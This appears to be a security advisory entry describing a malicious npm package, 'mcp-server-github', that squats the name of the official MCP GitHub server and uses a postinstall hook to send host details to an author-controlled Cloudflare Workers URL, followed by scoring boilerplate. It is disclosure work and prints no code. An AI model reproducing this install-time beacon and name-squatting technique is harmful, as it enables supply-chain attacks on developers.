Vulnerability
Malicious code in mcp-server-github (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (156761c4bd0e22759f082d7c030c241be12301dced1e58943c17aaacf9fe0958) Package squats the unscoped name `mcp-server-github` to intercept installs intended for the official `@modelcontextprotocol/server-github`. `package.json` declares `"postinstall": "node index.js"`, so on every `npm install` the bundled `index.js` unconditionally POSTs `os.hostname()`, `process.cwd()`, `process.env.npm_config_user_agent`, Node version, and `os.platform()` to `https://npx-canary-log.vulnerable-live.workers.dev/log`. The installer has no opportunity to opt out: the beacon fires before any code path explicitly requires the package, and the destination is a third-party Cloudflare Workers endpoint controlled by the package author. The combination of name-impersonation of a widely-used MCP server plus install-time host-identifier exfiltration to an author-controlled endpoint constitutes a supply-chain attack against anyone who runs `npx mcp-server-github` or installs the unscoped name expecting the official package.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence